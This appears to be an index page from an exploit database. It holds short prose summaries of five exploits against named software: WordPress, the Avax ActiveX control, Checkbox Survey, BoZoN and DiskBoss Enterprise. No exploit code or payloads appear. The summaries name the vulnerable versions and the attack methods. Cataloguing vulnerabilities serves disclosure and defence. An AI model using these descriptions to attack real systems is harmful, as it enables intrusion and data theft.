Explore Vulnerabilities

Explore all Exploits:

WordPress Arbitrary File Upload

This script allows an attacker to upload arbitrary files to a vulnerable WordPress installation. It takes the target host, a valid username and password, the path to the remote file, and the file to upload as arguments. The script also creates a new post every time it is run, unless a post ID is specified.

Avaxswf.dll v.1.0.0.1 from Avax Vector software ActiveX Arbitrary Data Write

The Avaxswf.dll library included in the Avax Vector ActiveX v.1.3 software package is vulnerable to an arbitrary data write on a remote computer. The WriteMovie method doesn't check whether it is being called by the application or by a malicious user, so it handles local files insecurely and lets malicious users write arbitrary data to any file on a vulnerable system.

Check Box 2016 Q2 Survey Multiple Vulnerabilities

Checkbox is a survey application deployed by a number of high-profile companies and government entities. The vulnerabilities include a directory traversal vulnerability, a direct object reference vulnerability, and an open redirection vulnerability. The directory traversal vulnerability allows an attacker to download sensitive files such as the web.config file. The direct object reference vulnerability allows access to attachments without login. The open redirection vulnerability allows an attacker to redirect users to a malicious website.

BoZoN Pre-Auth Command Execution

A Bozon vulnerability allows unauthenticated attackers to add arbitrary users and inject system commands into the "auto_restrict_users.php" file of the Bozon web interface. This issue results in arbitrary code execution on the affected host: the attacker's system commands are written to and stored in the PHP file "auto_restrict_users.php" under the private/ directory of the Bozon application, making them persist. Remote attackers get the command responses from functions like phpinfo() as soon as the HTTP request has completed. In addition, when an admin or user logs in or the webpage is reloaded, the attacker's commands are then executed, as they are stored. If a command is not injected into the "auto_restrict_users.php" file, unauthenticated attackers can opt to add user accounts at will.

DiskBoss Enterprise GET Buffer Overflow

This module exploits a stack-based buffer overflow vulnerability in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1.

Recent Exploits: